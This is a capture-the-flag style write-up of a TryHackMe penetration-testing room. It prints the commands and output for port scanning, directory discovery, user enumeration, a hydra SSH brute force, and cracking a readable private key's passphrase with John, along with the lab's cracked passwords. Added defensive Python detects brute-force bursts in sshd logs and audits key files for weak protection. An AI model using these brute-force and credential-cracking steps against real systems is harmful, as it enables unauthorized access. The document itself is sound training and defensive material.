After my success in a previous TryHackMe room, I decided to have a go at another one. This time it was a bit more difficult, and I have to admit, I needed to check the video at some stages to get some guidance. Nevertheless, here is how I managed to complete the room.
The room was designed to give the user experience with the following tools and techniques:
- brute forcing
- hash cracking
- service enumeration
- Linux Enumeration
I didn't have much experience with hash cracking or brute forcing, so this was a good room for me to learn a bit about that. I was familiar with the name of one of the tools I ended up using but hadn't used it in over a decade.
The list of challenges/questions for this room was as follows:
- Find the services exposed by the vulnerable machine
- What is the name of the hidden directory on the web server?
- Use brute-forcing to find the username and password
- What is the username?
- What is the password?
- What service do you use to access the server?
- Enumerate the machine to find any vectors for privilege escalation
- What is the name of the other user you found?
- If you have found another user, what can you do with this information?
- What is the final password you obtain?
Find the Services
The first thing I did was open up nmap and do a port scan on the server, asking it to retrieve the services and their versions, if possible.
```
┌──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse]
└─$ nmap -sV 10.10.112.215
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-20 01:08 CET
Nmap scan report for 10.10.112.215
Host is up (0.042s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Then I went to the website hosted on port 80 and was greeted with the following under construction page.
Although there was nothing to see here, because of the question I knew there was a hidden directory hosted on this server, so it was time to use dirbuster to scan for any hidden directories.
Find the Hidden Directory
```
┌──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse]
└─$ dirb http://10.10.112.215

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Dec 20 01:12:05 2020
URL_BASE: http://10.10.112.215/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.112.215/ ----
==> DIRECTORY: http://10.10.112.215/development/
+ http://10.10.112.215/index.html (CODE:200|SIZE:158)
+ http://10.10.112.215/server-status (CODE:403|SIZE:301)

---- Entering directory: http://10.10.112.215/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Dec 20 01:15:13 2020
DOWNLOADED: 4612 - FOUND: 2
```
Scanning the directory with dirbuster I was able to determine that the name of the hidden directory was in fact: development.
In this directory, there were 2 text files, the contents of which were as follows:
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP.
This led me off on a bit of a tangent, searching for vulnerabilities for Struts version 2.5.12 and the Tomcat server which was running on port 8080. This ultimately ended up fruitless.
Finding the Usernames
Earlier on in one of the AdventOfCyber2 challenges, I was introduced to a script which could enumerate a Linux server and return a wealth of information about it. I decided to try and run that script against the server instead. This script is called enum4linux and comes preinstalled with Kali-Linux.
The results of running this against the server revealed a lot of information, but perhaps the most important was the usernames of the J and K users. A snippet from this script showed me the following:
```
┌──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse]
└─$ enum4linux -a 10.10.81.129
...
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
...
```
So now I have the answers for questions 3, 4, 5 and 8. But how to get the password for the user, and which user to try and crack? Well, from the message that Kay so kindly left for Jan in the hidden development folder, we know that Jan has a weak password that should be easy to crack, so I decided to try that next.
Cracking the Password
From the port scan earlier I know that an SSH server is running on port 22, so I try and brute-force the ssh login. I used a tool called hydra to do this. I gave hydra the known username, "jan", and a list of passwords. Hydra will try all the passwords in the list and show me whenever there's a successful match.
```
┌──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse]
└─$ hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.81.129 ssh -f
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-20 23:13:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.81.129:22/
[STATUS] 181.00 tries/min, 181 tries in 00:01h, 14344223 to do in 1320:50h, 16 active
[STATUS] 130.67 tries/min, 392 tries in 00:03h, 14344009 to do in 1829:36h, 16 active
[ERROR] Can not create restore file (./hydra.restore) - Permission denied
[ssh] host: 10.10.81.129   login: jan   password: armando
[STATUS] attack finished for 10.10.81.129 (valid pair found)
```
So the answer to question 5, the password, is
Login with SSH
Perfect, now I have the password for the Jan user. I can use this to log in via SSH.
```
┌──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse]
└─$ ssh email@example.com
firstname.lastname@example.org's password:
Last login: Sun Dec 20 17:33:33 2020 from 10.8.145.210
jan@basic2:~$
```
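Seen from the server, the Hydra run and the login that followed leave a clear pattern in the sshd log: a burst of failed passwords for one account from one address, then an accepted password from that same address. The following is an added example, not part of the original write-up, that detects this pattern. The log lines are constructed in the stock OpenSSH syslog format, and the function name, threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd syslog lines for illustration; not captured from the room's server.
SAMPLE_LOG = """\
Dec 20 23:13:05 basic2 sshd[1201]: Failed password for jan from 10.8.145.210 port 40112 ssh2
Dec 20 23:13:05 basic2 sshd[1202]: Failed password for jan from 10.8.145.210 port 40114 ssh2
Dec 20 23:13:06 basic2 sshd[1203]: Failed password for jan from 10.8.145.210 port 40116 ssh2
Dec 20 23:13:06 basic2 sshd[1204]: Failed password for jan from 10.8.145.210 port 40118 ssh2
Dec 20 23:13:07 basic2 sshd[1205]: Failed password for kay from 192.168.56.102 port 51820 ssh2
Dec 20 23:13:08 basic2 sshd[1206]: Failed password for jan from 10.8.145.210 port 40120 ssh2
Dec 20 23:13:09 basic2 sshd[1207]: Failed password for jan from 10.8.145.210 port 40122 ssh2
Dec 20 23:13:10 basic2 sshd[1208]: Accepted password for jan from 10.8.145.210 port 40124 ssh2
Dec 20 23:13:15 basic2 sshd[1209]: Accepted password for kay from 192.168.56.102 port 51822 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def analyse(log_text, year=2020, window=timedelta(minutes=5), threshold=5):
    """Flag failure bursts per (ip, user) and any successful login that follows one."""
    recent = defaultdict(list)          # (ip, user) -> failure times inside the window
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year, so the caller supplies it.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key = (m["ip"], m["user"])
        recent[key] = [t for t in recent[key] if ts - t <= window]
        if m["result"] == "Failed":
            recent[key].append(ts)
            if len(recent[key]) == threshold:
                findings.append(("bruteforce", *key, threshold))
        else:
            if len(recent[key]) >= threshold:   # success right after a burst
                findings.append(("login_after_bruteforce", *key, len(recent[key])))
            recent[key].clear()
    return findings

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(finding)
```

The single mistyped password for kay followed by a successful login stays below the threshold and is not reported.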
Enumerating the Linux Server
So now that I have SSH access to the server, it's time to run an enumeration script locally on the machine, to see if there are any avenues I can exploit. I used a script called LinPeas.sh that I found on GitHub. LinPeas gives a lovely colourful output of the various things it has found, with colour coding for severity, so it is easy to know what to try and exploit first.
```
┌──(gareth㉿SRF239-L)-[~/Desktop/Tools]
└─$ scp linpeas.sh email@example.com:/tmp/linpeas.sh
firstname.lastname@example.org's password:
linpeas.sh
jan@basic2:~$ cd /tmp
jan@basic2:/tmp$ ls
hsperfdata_tomcat9  linpeas.sh  systemd-private-57d6d8ce909b4ab5881fd8dfb036a4b1-systemd-timesyncd.service-9s6Nq1
jan@basic2:/tmp$ chmod +x linpeas.sh
jan@basic2:/tmp$ ./linpeas.sh
```
This script produced a lot of output. The most interesting however was the availability of an ssh file for the other user on the system (kay).
```
[+] Searching ssl/ssh files
/home/kay/.ssh/authorized_keys  /home/kay/.ssh/id_rsa  /home/kay/.ssh/id_rsa.pub
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
Possible private SSH keys were found!
/home/kay/.ssh/id_rsa
```
Let's see if I can access this file, and if so, if I can use it to log in as the Kay user.
Remarkably the file was readable by the Jan user, so I now have the private key. I copied it to my local machine (using scp) and tried to log in as kay.
Cracking the SSH Key Password
So it looks like I need to try and crack this ssh file's password. I can use a tool called John to try and do this. To be able to use John though, I need to convert this ssh file into a format it understands. Thankfully there's a script that comes with Kali-Linux called ssh2john.py which will do just that.
Once I have the file in the format John understands, it's time to crack the password. For this cracking attempt, as with the previous one, we'll be using a very large and famous wordlist called rockyou.txt.
```
┌──(gareth㉿SRF239-L)-[~/.ssh]
└─$ /usr/share/john/ssh2john.py kay_id_rsa > kay_id_rsa_john

┌──(gareth㉿SRF239-L)-[~/.ssh]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt kay_id_rsa_john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax          (kay_id_rsa)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:07 DONE (2020-12-20 23:56) 0.1336g/s 1917Kp/s 1917Kc/s 1917KC/sa6_123..*7¡Vamos!
Session completed
```
It worked!! I can now use the found password beeswax to add the ssh key and log in to the server as kay.
```
┌──(gareth㉿SRF239-L)-[~/.ssh]
└─$ ssh -i kay_id_rsa email@example.com
Enter passphrase for key 'kay_id_rsa':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102
kay@basic2:~$
```
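Two weaknesses combined here: the private key was readable by another local user, and John's output (Cost 1 = 0, MD5/AES; iteration count 1) shows the passphrase was stretched with a single MD5 round, which is what the legacy PEM key format does. The following is an added example, not part of the original write-up, that audits a key file for both conditions. The function names and the two sample files are assumptions; the samples are constructed format headers with no real key material, and the 0644 mode on the first one is chosen to mimic the readable key described above.

```python
import base64, stat, struct, tempfile
from pathlib import Path

def _s(b):  # encode one SSH wire-format string (uint32 length + bytes)
    return struct.pack(">I", len(b)) + b
def _read_str(buf, off):  # decode one SSH string -> (bytes, next offset)
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n

def passphrase_kdf(pem_text):
    """Describe how a private key file's passphrase is stretched."""
    lines = pem_text.strip().splitlines()
    if lines[0] == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        magic = b"openssh-key-v1\0"
        if not blob.startswith(magic):
            return "unrecognised"
        _cipher, off = _read_str(blob, len(magic))
        kdf, off = _read_str(blob, off)
        opts, _ = _read_str(blob, off)
        if kdf == b"none":
            return "unencrypted"
        # bcrypt kdfoptions = string salt + uint32 rounds, so rounds is the tail
        return f"{kdf.decode()} rounds={struct.unpack('>I', opts[-4:])[0]}"
    if any(l.startswith("DEK-Info:") for l in lines):
        return "legacy PEM: MD5, 1 iteration"  # OpenSSL EVP_BytesToKey
    return "PKCS#8 encrypted" if "ENCRYPTED" in lines[0] else "unencrypted"

def audit_key(path):
    """Return (readable_by_group_or_other, kdf_description) for one key file."""
    mode = stat.S_IMODE(Path(path).stat().st_mode)
    return bool(mode & 0o044), passphrase_kdf(Path(path).read_text())

# Constructed samples: format headers only, no real key material.
LEGACY = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
          "DEK-Info: AES-128-CBC," + "0" * 32 + "\n\nAAAA\n-----END RSA PRIVATE KEY-----\n")
_HDR = (b"openssh-key-v1\0" + _s(b"aes256-ctr") + _s(b"bcrypt")
        + _s(_s(b"\0" * 16) + struct.pack(">I", 16)) + struct.pack(">I", 1))
MODERN = ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(_HDR).decode()
          + "\n-----END OPENSSH PRIVATE KEY-----\n")

def demo():  # write both samples with different modes and audit them
    out = {}
    with tempfile.TemporaryDirectory() as d:
        for name, text, mode in (("kay_like", LEGACY, 0o644), ("hardened", MODERN, 0o600)):
            path = Path(d, name)
            path.write_text(text)
            path.chmod(mode)
            out[name] = audit_key(path)
    return out
```

A key reported as legacy PEM can be rewritten in the bcrypt-based format with `ssh-keygen -p -o -a <rounds> -f <keyfile>`, and `chmod 600` removes group and other read access.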
Now it's time to find the password to answer the final question for the room.
Luckily in the home directory I found a file called pass.bak. This file contains the final password:
```
kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@basic2:~$
```
This room was a lot more difficult than the previous one. There were several different tools involved and a few different potential avenues to explore.
It taught me the importance of running enumeration scripts early to see if they can help solve problems automatically, without wasting time trying to find out things for myself in a more manual way.
It also opened up my eyes to how easy it is to run brute-force attacks against systems, and how to crack files offline as well.
I really enjoyed this room and hope I can find another similar one to try without having to resort to peeking at the video to make progress.